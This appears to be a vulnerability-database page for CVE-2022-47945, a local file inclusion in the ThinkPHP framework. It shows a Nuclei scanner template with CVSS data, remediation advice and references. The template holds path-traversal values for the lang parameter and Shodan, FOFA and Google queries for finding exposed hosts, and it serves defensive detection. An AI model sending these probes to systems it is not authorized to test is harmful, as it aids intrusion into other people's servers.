Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-47945HistoryDec 23, 2022 - 7:25 a.m.
Thinkphp Lang - Local File Inclusion
2022-12-2307:25:38
ProjectDiscovery
github.com
166
cve2022
thinkphp
lfi
local file inclusion
remote code execution
unauthorized access
data leakage
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.5 High
AI Score
Confidence
High
0.048 Low
EPSS
Percentile
92.8%
ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.
id: CVE-2022-47945
info:
name: Thinkphp Lang - Local File Inclusion
author: kagamigawa
severity: critical
description: |
ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.
impact: |
This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
remediation: |
Apply the latest security patches and updates provided by the Thinkphp framework.
reference:
- https://tttang.com/archive/1865/
- https://nvd.nist.gov/vuln/detail/CVE-2022-47945
- https://github.com/top-think/framework/compare/v6.0.13...v6.0.14
- https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47945
cwe-id: CWE-22
epss-score: 0.04137
epss-percentile: 0.92167
cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: thinkphp
product: thinkphp
shodan-query:
- title:"Thinkphp"
- http.title:"thinkphp"
- cpe:"cpe:2.3:a:thinkphp:thinkphp"
fofa-query:
- header="think_lang"
- title="thinkphp"
google-query: intitle:"thinkphp"
tags: cve,cve2022,thinkphp,lfi
http:
- method: GET
path:
- "{{BaseURL}}/?lang=../../thinkphp/base"
- "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Call Stack'
- 'class="trace'
condition: and
- type: status
status:
- 500
# digest: 4a0a004730450221008f1af4db19b6e2a6ea8eac38119f34c635b5ead62dbf540348f21dec73c16ca902203f700eef9c4169e63b94f7e4d602a219c7ae2bd9c6110dc2bc4822398f2b9a6f:922c64590222798bb761d5b6d8e72950Related
osv
osv
ThinkPHP Framework vulnerable to remote code execution
2022-12-23 21:30:17
CVE-2022-47945
2022-12-23 21:15:09
cve
cve
CVE-2022-47945
2022-12-23 21:15:09
prion
prion
Design/Logic Flaw
2022-12-23 21:15:00
github
github
ThinkPHP Framework vulnerable to remote code execution
2022-12-23 21:30:17
cvelist
cvelist
CVE-2022-47945
2022-12-23 00:00:00
nvd
nvd
CVE-2022-47945
2022-12-23 21:15:09
veracode
veracode
Remote Code Execution (RCE)
2023-01-02 13:03:01
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.5 High
AI Score
Confidence
High
0.048 Low
EPSS
Percentile
92.8%
Related for NUCLEI:CVE-2022-47945